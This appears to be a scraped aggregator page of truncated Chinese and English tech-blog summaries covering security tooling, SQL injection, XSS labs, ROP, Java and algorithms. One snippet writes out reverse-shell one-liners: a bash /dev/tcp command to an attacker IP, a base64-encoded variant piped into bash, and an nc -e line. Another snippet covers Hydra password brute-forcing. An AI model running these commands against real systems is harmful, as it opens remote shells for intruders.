- 业界优秀零信任安全管理系统产品介绍
scuter_yu
安全网络
腾讯iOA零信任安全管理系统腾讯iOA零信任安全管理系统是基于腾讯自身无边界零信任企业网的最佳实践推出的终端访问管理方案。它以可信终端、可信身份、可信应用、可信链路为核心,全方位保护企业终端安全,无需VPN即可实现远程办公,且支持公有云和本地云部署模式。该系统依托腾讯安全威胁情报中心,日均拦截超10亿次攻击,其客户端轻量化设计兼容多平台,员工接受度高,助力企业安全上云和数字化转型。深信服零信任iT
- ubuntu安装配置fail2ban
你都会上树?
Linuxubuntulinux运维
Fail2Ban概述Fail2Ban是一种用于防止暴力破解攻击的安全工具,它通过监控系统的日志文件(如/var/log/auth.log)来检测异常的登录尝试,并自动将可疑的IP地址加入黑名单,从而阻止其进一步的访问请求。Fail2Ban的工作原理日志监控:Fail2Ban持续监控指定的日志文件,寻找失败的登录尝试记录。规则匹配:根据预设的规则(如连续失败的次数和时间间隔),Fail2Ban识别出
- NPM组件 betsson 等窃取主机敏感信息
墨菲安全
npm前端node.jsNPM组件投毒软件供应链安全主机信息窃取
【高危】NPM组件betsson等窃取主机敏感信息漏洞描述当用户安装受影响版本的betsson组件包时会窃取用户的主机名、用户名、工作目录、IP地址等信息并发送到攻击者可控的服务器地址。MPS编号MPS-2nrw-lifd处置建议强烈建议修复发现时间2025-06-30投毒仓库npm投毒类型主机信息收集利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本betsson[1.0.0,99.
- Web学习:SQL注入之联合查询注入
kaikaile1995
前端学习sql
SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。本文将深入探讨SQL注入的一个重要变种——联合查询注入(Union-basedSQLInjection),介绍其原理、常见攻击方式、以及防御措施。SQL注入概述SQL注入是指将恶意的SQL代码插入到应用程序的输入字段中,使得这些代码被意外
- [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
寒蝉听雨[原ID_PowerShell]
[靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
博主介绍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
- js 允许生成特殊的变量名 基于字符集编码混淆的 XSS 绕过漏洞 -- Google 2025 Lost In Transliteration
A5rZ
网络安全
题目实现了一个字符转换工具在/file路由用户可以通过ct参数自定义Content-Type//文件路由-提供静态文件服务(JS和CSS),支持内容类型验证app.MapGet("/file",(stringfilename="",string?ct=null,string?q=null)=>{//根据文件名查找对应的模板文件string?template=FindFile(filename);i
- 高防CDN:网络安全的“盾牌”与加速利器
上海云盾-高防顾问
web安全网络安全
在数字化时代,网络安全和访问速度是网站运营的两大核心挑战。尤其是面对日益频繁的DDoS攻击和全球用户对快速访问的需求,高防CDN(高防御内容分发网络)成为企业和开发者的重要选择。本文将用通俗易懂的方式,解析高防CDN的概念及其工作原理。什么是高防CDN?高防CDN是融合了CDN加速与DDoS防护能力的网络安全服务。它不仅通过全球分布的节点缓存内容,提升用户访问速度,还能识别并抵御大规模流量攻击(如
- (LeetCode 热题 100) 51.N皇后
YuforiaCode
LeetCode热题100题解leetcode算法java深度优先
目录题目:题目描述:题目链接:思路:核心思路:思路详解:代码:Java代码:题目:题目描述:题目链接:51.N皇后-力扣(LeetCode)思路:核心思路:dfs全排列思路详解:由题规则:皇后可以攻击与之处于同一行或者同一列或同一斜线上的棋子。我们可以提炼得到同一行只能放一个皇后,而且每一行都要放一个皇后,因为有n个皇后。所以搜索思路和全排列的搜索思路一样:从第0行开始枚举皇后的某个位置,然后从上
- Open AI在AI人工智能领域的技术安全防护体系
AI智能探索者
AIAgent智能体开发实战人工智能安全网络ai
OpenAI在AI人工智能领域的技术安全防护体系关键词:OpenAI、AI安全、技术防护、伦理框架、模型对齐、数据隐私、对抗攻击摘要:本文将深入探讨OpenAI在人工智能领域构建的多层次技术安全防护体系。我们将从基础概念出发,逐步解析OpenAI如何通过技术创新和系统设计来确保AI系统的安全性、可靠性和可控性。文章将涵盖从数据安全到模型对齐,从伦理框架到实际防护技术的全方位内容,帮助读者全面理解现
- 页面弹窗≠有效漏洞:揭秘 XSS 中的沙箱与子域名隔离
vortex5
web安全xss安全前端
前言跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的安全漏洞,攻击者通过将恶意脚本注入到看似安全可靠的网站中,影响其他用户的正常使用。假设你使用了一个简单的XSS有效载荷,比如alert(1),它会在执行时弹出一个窗口。虽然这个弹窗能直观地告诉你代码被触发,但它无法准确揭示一个关键信息:有效载荷究竟是在哪里执行的?相比之下,使用alert(document.domai
- Java面试题专项(Redis篇)
嗨,正在熬夜的你
面试部分javaredis开发语言
1.什么是缓存穿透?怎么解决?答:缓存穿透是指查询一个一定不存在的数据(例:假设数据库只有用户1-1000的信息,黑客一直请求用户ID=99999,每次都查DB,DB扛不住。),由于存储层查不到数据因此不写入缓存,这将导致这个不存在的数据每次请求都要到DB去查询,可能导致DB挂掉。这种情况大概率是遭到了攻击。通常都用布隆过滤器(提前用布隆过滤器存储所有存在的key。查询前先查布隆过滤器,不存在的直
- poi 实现表头斜线功能
GoodStudyAndDayDayUp
javapoi实现表头斜线功能
1.poi实现表头斜线功能2.直接上codeprivatevoidsetDrigonal(){if(sheetinstanceofXSSFSheet){XSSFSheetxssfSheet=(XSSFSheet)sheet;XSSFDrawingdrawing=xssfSheet.createDrawingPatriarch();//从左上(0,0)到右下(1023,255)dagron_1(dr
- 信创领域的十大网络安全威胁有哪些
极创信息
信创产品兼容性互认证国产化信创安全eclipsejavatomcathibernateopencv数据挖掘
在信创(信息技术应用创新)领域,由于其涉及自主可控软硬件、核心技术与基础设施,网络安全威胁尤为突出,其网络安全威胁不仅涉及传统IT系统的共性问题,还因技术生态的独特性面临特殊挑战。结合信创环境的特点,以下是信创领域面临的十大主流网络安全威胁。一.人员安全意识不足真实的网络攻击可能并不需要多么高深的技术,更多的是针对人员的安全意识不足发起的攻击。在信创项目建设和运营过程中,涉及大量研发、实施、运维和
- 微软服务器安全问题
国际云1688
微软云云计算服务器云原生运维azure
微软云服务器安全深度解析:挑战、应对与未来展望——构建韧性“安全之盾”的持续博弈!在当今数字化时代,云计算已成为众多企业和组织运行业务的核心基础设施和“数字生命线”,而微软云(Azure)作为全球领先的云服务提供商之一,其安全性无疑是全球数十万企业客户最为关注的焦点。然而,近年来,我们不得不承认,微软云服务器却频繁出现安全事故,从配置错误引发的数据泄露到DDoS攻击下的防护困境,再到软件更新导致的
- linux 内核日志等级,Linux系统日志管理
走神儿大神
linux内核日志等级
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?Linux系统中的日志记录了系统每天发生的各种各样的事情,你可以通过它来检查错误发生的原因,或者受到攻击时攻击者留下的痕迹。日志对于安全来说,非常重要。一、日志介绍日志主要包含以下内容:历史事件:时间,地点,人物,事件日志级别:事件的关键性程度,Loglevel系统中常见日志及说明:系统日志服务:CentOS5之前版本sy
- 车载以太网-ARP 动态 静态
天赐好车
车载以太网车载以太网ARP
目录ARP(地址解析协议):动态与静态**一、ARP协议的基本概念****二、动态ARP与静态ARP的核心区别****三、动态ARP:原理与机制**1.**工作流程**2.**缓存管理****四、静态ARP:配置与应用**1.**手动配置方式**2.**典型应用场景****五、动态ARP的安全风险与防护**1.**常见攻击方式**2.**防护措施****六、总结:如何选择动态或静态ARP?**车载
- 通过HTTPS访问Harbor2.13.1 的配置
云游
HarbordockerhttpsHarbor
1.环境操作系统版本:Ubuntu24.04.2LTSopenssl的版本:3.0.15Harbor版本:2.13.12.说明默认情况下,Harbor不附带证书。可以在没有安全性的情况下部署Harbor,这样您就可以通过HTTP连接到它。然而,只有在没有连接到外部互联网的测试或开发环境中,使用HTTP才是可接受的。在非测试环境中使用HTTP会使您面临中间人攻击。在生产环境中,始终使用HTTPS。要
- 8 [GitHub开源项目被投毒后门病毒跟随开发流程传播蔓延]
学编程的闹钟
GitHubgithub开源
现如今,代码的开放给软件开发提供了诸多便利,GitHub就是其中极具代表性的平台。然而随着“开放”逐渐广泛,其被恶意利用的风险也随之增加。近年来,一种隐蔽又危险的攻击手段——代码投毒,悄悄成了威胁开发者和用户安全的隐患。攻击者会在开源项目或代码库里植入有害代码,这些看似正常的代码,一旦被开发者无意中引入,就会在开发链条中蔓延,最终让用户也面临安全风险。近期,火绒威胁情报中心监测到一批GitHub投
- 【代码审计】安全审核常见漏洞修复策略
秋说
Java代码审计网络安全代码审计
文章目录1.异常信息泄露修复建议不推荐用法推荐用法2.文件上传漏洞错误示例(缺乏校验)安全示例(含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击)错误示例(存在风险)安全示例(自动转义)修复建议7.接口未鉴权修复建议8.路径遍历漏洞错误示例
- 2025年全球数据安全发展趋势
jinan886
人工智能大数据安全数据分析
随着云计算、大数据、人工智能等技术的迅猛发展,数据已成为驱动经济社会发展的关键生产要素。然而,数据泄露、网络攻击等安全事件频发,给个人隐私、企业利益乃至国家安全带来了前所未有的挑战。全球数据安全发展趋势正随着技术进步和威胁演变而不断变化,以下是主要趋势:1.数据隐私法规加强GDPR(欧盟《通用数据保护条例)和CCPA(加州消费者隐私法案)等法规推动了全球对数据隐私的重视,更多国家和地区正在制定或更
- 二次开发源码 借贷系统uniapp/借贷认证系统/小额信贷系统/工薪贷APP/资金贷系统h5
csdndddsd
uniapp借贷系统开发小额贷系统app工薪贷系统安装搭建信用贷认证系统h5资金贷系统安装搭建教程借贷系统安装搭建借贷系统二次开发
前端:UNIAPP后端:ThinkPHP数据库:Mysql前端使用的uniapp可以打包APPH5小程序系统提供了完善的网络借贷体系,为金融中介平台提供从获客到贷后管理全流程服务,解决了借贷手续繁琐、流程缓慢等问题此源码为运营中版本,具有极高稳定性,防注入,防攻击,修复全部已知后门漏洞仅供学习演示、二次开发专用,禁止一切违法行为的利用!可提现金额(元)¥{{qbMoney}}充值提现余额明细余额变
- 【ARM 芯片 安全与攻击 5.7 -- 码重用攻击】
主公讲 ARM
#【ARM芯片安全与攻击专栏】arm开发安全代码重用攻击
文章目录什么是代码重用攻击?ROP攻击示例示例背景攻击步骤假设的ROP链构建输入数据使用payload进行攻击防御措施Summary什么是代码重用攻击?代码重用攻击(CodeReuseAttack,CRA)是一种利用现有的合法代码片段来执行恶意行为的攻击方法。由于现代操作系统和处理器通常会采用数据执行保护(DEP)等安全机制,直接在堆栈或堆上执行注入的恶意代码变得困难。代码重用攻击通过拼接或链接现
- ROP和Ret2libc漏洞
卍king卐然
web安全经验分享ROP攻击
一、ROP攻击原理ROP全称为Return-orientedProgramming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。ROP的核心思想:攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片
- 筑牢网络安全屏障
qq_43090857
web安全网络安全
在数字化浪潮席卷全球的今天,网络空间已成为继陆、海、空、天之后的“第五疆域”,深刻影响着国家政治、经济、军事等各个领域。“没有网络安全就没有国家安全”,这句论断精准道出了网络安全与国家安全之间密不可分的关系。网络安全关乎国家政治安全。恶意势力通过网络传播虚假信息、煽动社会情绪,企图扰乱社会秩序、动摇政治稳定。同时,关键信息基础设施如能源、交通、通信系统,一旦遭受网络攻击瘫痪,将直接威胁国家经济命脉
- 黑客入门 | 用ROP和shellcode攻击SolarWinds Serv-U SSH漏洞
廖致君
安全网络攻击模型
(备注:黑客Hacker并不等同于信息安全罪犯。)最近花了些时间学习bufferoverflow安全漏洞,做了大名鼎鼎的CSAPP课程里的attacklab,学到了return-orientedprogramming(ROP)这种让我大开眼界的进攻方式。于是想要趁热打铁,来详细研究一下现实世界中的黑客进攻案例。本篇文章挑选的是2021年SolarWindsServ-UFTP软件中的漏洞,记录编号C
- 十八、windows系统安全---利用Hydra获得账号密码
midsummer_woo
Windows系统安全安全windows
环境靶机:windowsserver2012攻击机:kalilinux靶机环境密码为弱口令设定登录失败的次数锁定用户账号,关闭密码复杂度步骤1.在kali上探测目标主机(可在目标主机通过ipconfig查看目标主机IP)是否开启445端口nmap192.168.99.105-p4452.使用hydra对已知的administrator账号进行爆破(注意pass.txt的路径)hydra-ladmi
- Windows 权限维持-后门隐藏
蟹老板6
windows后门排查权限维持后门隐藏
交流使用,请勿做非法用途攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现隐藏文件1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。如何真正隐藏文件?使用Attrib+s+a+h+r命令就是把原本的
- 各种shell反弹方法
!QK
linux网络安全安全web安全bash
1.利用bash进行反弹shell先使用nc进行监听nc-lvvpport端口号再在目标机器执行bash-i>&/dev/tcp/攻击ip/端口0>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}2.使用nc进行反弹shellnc-e/bin/bash攻击IP端
- python反弹shell
46497976464
linux网络运维服务器
你是想问Python如何实现反弹shell吗?反弹shell是一种通过远程连接获取受害者计算机的shell权限的攻击技术。使用Python反弹shell的方法如下:首先,在本地计算机上运行一个监听程序,等待连接。然后,在受害者计算机上运行一个Python脚本,该脚本将连接到本地计算机的监听程序。当连接建立后,就可以通过本地计算机上的shell命令控制受害者计算机。具体的代码实现可以参考如下:本地计
- AMD机密计算虚拟机介绍
李天琦
云计算程序人生学习AMD机密计算机密计算云主机虚拟化
一、什么机密计算虚拟机机密计算虚拟机是一种基于硬件安全技术(如AMDSecureEncryptedVirtualization,SEV)的虚拟化环境,旨在保护虚拟机(VM)的运行中数据(包括内存、CPU寄存器等)免受外部攻击或未经授权的访问,即使云服务提供商或管理员也无法窥探。AMD关键技术SEV(SecureEncryptedVirtualization):通过内存加密和密钥隔离,为每个虚拟机分
- 戴尔笔记本win8系统改装win7系统
sophia天雪
win7戴尔改装系统win8
戴尔win8 系统改装win7 系统详述
第一步:使用U盘制作虚拟光驱:
1)下载安装UltraISO:注册码可以在网上搜索。
2)启动UltraISO,点击“文件”—》“打开”按钮,打开已经准备好的ISO镜像文
- BeanUtils.copyProperties使用笔记
bylijinnan
java
BeanUtils.copyProperties VS PropertyUtils.copyProperties
两者最大的区别是:
BeanUtils.copyProperties会进行类型转换,而PropertyUtils.copyProperties不会。
既然进行了类型转换,那BeanUtils.copyProperties的速度比不上PropertyUtils.copyProp
- MyEclipse中文乱码问题
0624chenhong
MyEclipse
一、设置新建常见文件的默认编码格式,也就是文件保存的格式。
在不对MyEclipse进行设置的时候,默认保存文件的编码,一般跟简体中文操作系统(如windows2000,windowsXP)的编码一致,即GBK。
在简体中文系统下,ANSI 编码代表 GBK编码;在日文操作系统下,ANSI 编码代表 JIS 编码。
Window-->Preferences-->General -
- 发送邮件
不懂事的小屁孩
send email
import org.apache.commons.mail.EmailAttachment;
import org.apache.commons.mail.EmailException;
import org.apache.commons.mail.HtmlEmail;
import org.apache.commons.mail.MultiPartEmail;
- 动画合集
换个号韩国红果果
htmlcss
动画 指一种样式变为另一种样式 keyframes应当始终定义0 100 过程
1 transition 制作鼠标滑过图片时的放大效果
css
.wrap{
width: 340px;height: 340px;
position: absolute;
top: 30%;
left: 20%;
overflow: hidden;
bor
- 网络最常见的攻击方式竟然是SQL注入
蓝儿唯美
sql注入
NTT研究表明,尽管SQL注入(SQLi)型攻击记录详尽且为人熟知,但目前网络应用程序仍然是SQLi攻击的重灾区。
信息安全和风险管理公司NTTCom Security发布的《2015全球智能威胁风险报告》表明,目前黑客攻击网络应用程序方式中最流行的,要数SQLi攻击。报告对去年发生的60亿攻击 行为进行分析,指出SQLi攻击是最常见的网络应用程序攻击方式。全球网络应用程序攻击中,SQLi攻击占
- java笔记2
a-john
java
类的封装:
1,java中,对象就是一个封装体。封装是把对象的属性和服务结合成一个独立的的单位。并尽可能隐藏对象的内部细节(尤其是私有数据)
2,目的:使对象以外的部分不能随意存取对象的内部数据(如属性),从而使软件错误能够局部化,减少差错和排错的难度。
3,简单来说,“隐藏属性、方法或实现细节的过程”称为——封装。
4,封装的特性:
4.1设置
- [Andengine]Error:can't creat bitmap form path “gfx/xxx.xxx”
aijuans
学习Android遇到的错误
最开始遇到这个错误是很早以前了,以前也没注意,只当是一个不理解的bug,因为所有的texture,textureregion都没有问题,但是就是提示错误。
昨天和美工要图片,本来是要背景透明的png格式,可是她却给了我一个jpg的。说明了之后她说没法改,因为没有png这个保存选项。
我就看了一下,和她要了psd的文件,还好我有一点
- 自己写的一个繁体到简体的转换程序
asialee
java转换繁体filter简体
今天调研一个任务,基于java的filter实现繁体到简体的转换,于是写了一个demo,给各位博友奉上,欢迎批评指正。
实现的思路是重载request的调取参数的几个方法,然后做下转换。
- android意图和意图监听器技术
百合不是茶
android显示意图隐式意图意图监听器
Intent是在activity之间传递数据;Intent的传递分为显示传递和隐式传递
显式意图:调用Intent.setComponent() 或 Intent.setClassName() 或 Intent.setClass()方法明确指定了组件名的Intent为显式意图,显式意图明确指定了Intent应该传递给哪个组件。
隐式意图;不指明调用的名称,根据设
- spring3中新增的@value注解
bijian1013
javaspring@Value
在spring 3.0中,可以通过使用@value,对一些如xxx.properties文件中的文件,进行键值对的注入,例子如下:
1.首先在applicationContext.xml中加入:
<beans xmlns="http://www.springframework.
- Jboss启用CXF日志
sunjing
logjbossCXF
1. 在standalone.xml配置文件中添加system-properties:
<system-properties> <property name="org.apache.cxf.logging.enabled" value=&
- 【Hadoop三】Centos7_x86_64部署Hadoop集群之编译Hadoop源代码
bit1129
centos
编译必需的软件
Firebugs3.0.0
Maven3.2.3
Ant
JDK1.7.0_67
protobuf-2.5.0
Hadoop 2.5.2源码包
Firebugs3.0.0
http://sourceforge.jp/projects/sfnet_findbug
- struts2验证框架的使用和扩展
白糖_
框架xmlbeanstruts正则表达式
struts2能够对前台提交的表单数据进行输入有效性校验,通常有两种方式:
1、在Action类中通过validatexx方法验证,这种方式很简单,在此不再赘述;
2、通过编写xx-validation.xml文件执行表单验证,当用户提交表单请求后,struts会优先执行xml文件,如果校验不通过是不会让请求访问指定action的。
本文介绍一下struts2通过xml文件进行校验的方法并说
- 记录-感悟
braveCS
感悟
再翻翻以前写的感悟,有时会发现自己很幼稚,也会让自己找回初心。
2015-1-11 1. 能在工作之余学习感兴趣的东西已经很幸福了;
2. 要改变自己,不能这样一直在原来区域,要突破安全区舒适区,才能提高自己,往好的方面发展;
3. 多反省多思考;要会用工具,而不是变成工具的奴隶;
4. 一天内集中一个定长时间段看最新资讯和偏流式博
- 编程之美-数组中最长递增子序列
bylijinnan
编程之美
import java.util.Arrays;
import java.util.Random;
public class LongestAccendingSubSequence {
/**
* 编程之美 数组中最长递增子序列
* 书上的解法容易理解
* 另一方法书上没有提到的是,可以将数组排序(由小到大)得到新的数组,
* 然后求排序后的数组与原数
- 读书笔记5
chengxuyuancsdn
重复提交struts2的token验证
1、重复提交
2、struts2的token验证
3、用response返回xml时的注意
1、重复提交
(1)应用场景
(1-1)点击提交按钮两次。
(1-2)使用浏览器后退按钮重复之前的操作,导致重复提交表单。
(1-3)刷新页面
(1-4)使用浏览器历史记录重复提交表单。
(1-5)浏览器重复的 HTTP 请求。
(2)解决方法
(2-1)禁掉提交按钮
(2-2)
- [时空与探索]全球联合进行第二次费城实验的可能性
comsci
二次世界大战前后,由爱因斯坦参加的一次在海军舰艇上进行的物理学实验 -费城实验
至今给我们大家留下很多迷团.....
关于费城实验的详细过程,大家可以在网络上搜索一下,我这里就不详细描述了
在这里,我的意思是,现在
- easy connect 之 ORA-12154: TNS: 无法解析指定的连接标识符
daizj
oracleORA-12154
用easy connect连接出现“tns无法解析指定的连接标示符”的错误,如下:
C:\Users\Administrator>sqlplus username/
[email protected]:1521/orcl
SQL*Plus: Release 10.2.0.1.0 – Production on 星期一 5月 21 18:16:20 2012
Copyright (c) 198
- 简单排序:归并排序
dieslrae
归并排序
public void mergeSort(int[] array){
int temp = array.length/2;
if(temp == 0){
return;
}
int[] a = new int[temp];
int
- C语言中字符串的\0和空格
dcj3sjt126com
c
\0 为字符串结束符,比如说:
abcd (空格)cdefg;
存入数组时,空格作为一个字符占有一个字节的空间,我们
- 解决Composer国内速度慢的办法
dcj3sjt126com
Composer
用法:
有两种方式启用本镜像服务:
1 将以下配置信息添加到 Composer 的配置文件 config.json 中(系统全局配置)。见“例1”
2 将以下配置信息添加到你的项目的 composer.json 文件中(针对单个项目配置)。见“例2”
为了避免安装包的时候都要执行两次查询,切记要添加禁用 packagist 的设置,如下 1 2 3 4 5
- 高效可伸缩的结果缓存
shuizhaosi888
高效可伸缩的结果缓存
/**
* 要执行的算法,返回结果v
*/
public interface Computable<A, V> {
public V comput(final A arg);
}
/**
* 用于缓存数据
*/
public class Memoizer<A, V> implements Computable<A,
- 三点定位的算法
haoningabc
c算法
三点定位,
已知a,b,c三个顶点的x,y坐标
和三个点都z坐标的距离,la,lb,lc
求z点的坐标
原理就是围绕a,b,c 三个点画圆,三个圆焦点的部分就是所求
但是,由于三个点的距离可能不准,不一定会有结果,
所以是三个圆环的焦点,环的宽度开始为0,没有取到则加1
运行
gcc -lm test.c
test.c代码如下
#include "stdi
- epoll使用详解
jimmee
clinux服务端编程epoll
epoll - I/O event notification facility在linux的网络编程中,很长的时间都在使用select来做事件触发。在linux新的内核中,有了一种替换它的机制,就是epoll。相比于select,epoll最大的好处在于它不会随着监听fd数目的增长而降低效率。因为在内核中的select实现中,它是采用轮询来处理的,轮询的fd数目越多,自然耗时越多。并且,在linu
- Hibernate对Enum的映射的基本使用方法
linzx0212
enumHibernate
枚举
/**
* 性别枚举
*/
public enum Gender {
MALE(0), FEMALE(1), OTHER(2);
private Gender(int i) {
this.i = i;
}
private int i;
public int getI
- 第10章 高级事件(下)
onestopweb
事件
index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
- 孙子兵法
roadrunners
孙子兵法
始计第一
孙子曰:
兵者,国之大事,死生之地,存亡之道,不可不察也。
故经之以五事,校之以计,而索其情:一曰道,二曰天,三曰地,四曰将,五
曰法。道者,令民于上同意,可与之死,可与之生,而不危也;天者,阴阳、寒暑
、时制也;地者,远近、险易、广狭、死生也;将者,智、信、仁、勇、严也;法
者,曲制、官道、主用也。凡此五者,将莫不闻,知之者胜,不知之者不胜。故校
之以计,而索其情,曰
- MySQL双向复制
tomcat_oracle
mysql
本文包括:
主机配置
从机配置
建立主-从复制
建立双向复制
背景
按照以下简单的步骤:
参考一下:
在机器A配置主机(192.168.1.30)
在机器B配置从机(192.168.1.29)
我们可以使用下面的步骤来实现这一点
步骤1:机器A设置主机
在主机中打开配置文件 ,
- zoj 3822 Domination(dp)
阿尔萨斯
Mina
题目链接:zoj 3822 Domination
题目大意:给定一个N∗M的棋盘,每次任选一个位置放置一枚棋子,直到每行每列上都至少有一枚棋子,问放置棋子个数的期望。
解题思路:大白书上概率那一张有一道类似的题目,但是因为时间比较久了,还是稍微想了一下。dp[i][j][k]表示i行j列上均有至少一枚棋子,并且消耗k步的概率(k≤i∗j),因为放置在i+1~n上等价与放在i+1行上,同理